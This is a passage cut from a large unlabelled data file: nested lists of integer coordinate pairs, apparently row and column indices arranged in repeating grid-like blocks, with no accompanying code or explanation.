27],[ 12 , 28],[ 12 , 29],[ 12 , 33],[ 12 , 34],[ 12 , 35],[ 12 , 39],[ 12 , 40],[ 12 , 41],[ 13 , 24],[ 13 , 27],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 13 , 42],[ 14 , 24],[ 14 , 27],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 14 , 42],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 15 , 41],[ 15 , 42],[ 16 , 25],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 16 , 41],[ 16 , 42],[ 17 , 25],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 41],[ 17 , 42],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 41],[ 18 , 42],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 32],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 40],[ 19 , 41],[ 19 , 42],[ 20 , 26],[ 20 , 29],[ 20 , 31],[ 20 , 32],[ 20 , 35],[ 20 , 37],[ 20 , 38],[ 20 , 40],[ 20 , 41],[ 20 , 42],[ 21 , 26],[ 21 , 29],[ 21 , 31],[ 21 , 32],[ 21 , 35],[ 21 , 37],[ 21 , 38],[ 21 , 40],[ 21 , 41],[ 21 , 42],[ 22 , 26],[ 22 , 29],[ 22 , 31],[ 22 , 32],[ 22 , 35],[ 22 , 37],[ 22 , 38],[ 22 , 40],[ 22 , 41],[ 22 , 42]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 18],[ 10 , 22],[ 10 , 23],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 1 , 33],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 27],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 5 , 39],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 27],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 6 , 39],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 7 , 39],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 9 , 40],[ 9 , 41],[ 9 , 42],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 10 , 40],[ 10 , 41],[ 10 , 42],[ 11 , 24],[ 11 , 28],[ 11 , 29],[ 11 , 30],[ 11 , 34],[ 11 , 35],[ 11 , 36],[ 11 , 40],[ 11 , 41],[ 11 , 42],[ 12 , 24],[ 12 , 28],[ 12 , 29],[ 12 , 30],[ 12 , 34],[ 12 , 35],[ 12 , 36],[ 12 , 40],[ 12 , 41],[ 12 , 42],[ 13 , 25],[ 13 , 28],[ 13 , 31],[ 13 , 32],[ 13 , 34],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 13 , 41],[ 13 , 43],[ 14 , 25],[ 14 , 28],[ 14 , 31],[ 14 , 32],[ 14 , 34],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 14 , 41],[ 14 , 43],[ 15 , 25],[ 15 , 28],[ 15 , 31],[ 15 , 32],[ 15 , 34],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 15 , 43],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 16 , 42],[ 16 , 43],[ 17 , 26],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 17 , 42],[ 17 , 43],[ 18 , 26],[ 18 , 29],[ 18 , 31],[ 18 , 33],[ 18 , 35],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 42],[ 18 , 43],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 33],[ 19 , 35],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 42],[ 19 , 43],[ 20 , 27],[ 20 , 30],[ 20 , 32],[ 20 , 33],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 41],[ 20 , 42],[ 20 , 43],[ 21 , 27],[ 21 , 30],[ 21 , 32],[ 21 , 33],[ 21 , 36],[ 21 , 38],[ 21 , 39],[ 21 , 41],[ 21 , 42],[ 21 , 43],[ 22 , 27],[ 22 , 30],[ 22 , 32],[ 22 , 33],[ 22 , 36],[ 22 , 38],[ 22 , 39],[ 22 , 41],[ 22 , 42],[ 22 , 43],[ 23 , 27],[ 23 , 30],[ 23 , 32],[ 23 , 33],[ 23 , 36],[ 23 , 38],[ 23 , 39],[ 23 , 41],[ 23 , 42],[ 23 , 43]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 38],[ 8 , 39],[ 8 , 40],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 19],[ 8 , 22],[ 8 , 25],[ 8 , 26],[ 8 , 28],[ 8 , 31],[ 8 , 32],[ 8 , 34],[ 8 , 35],[ 8 , 37],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 24],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 27],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 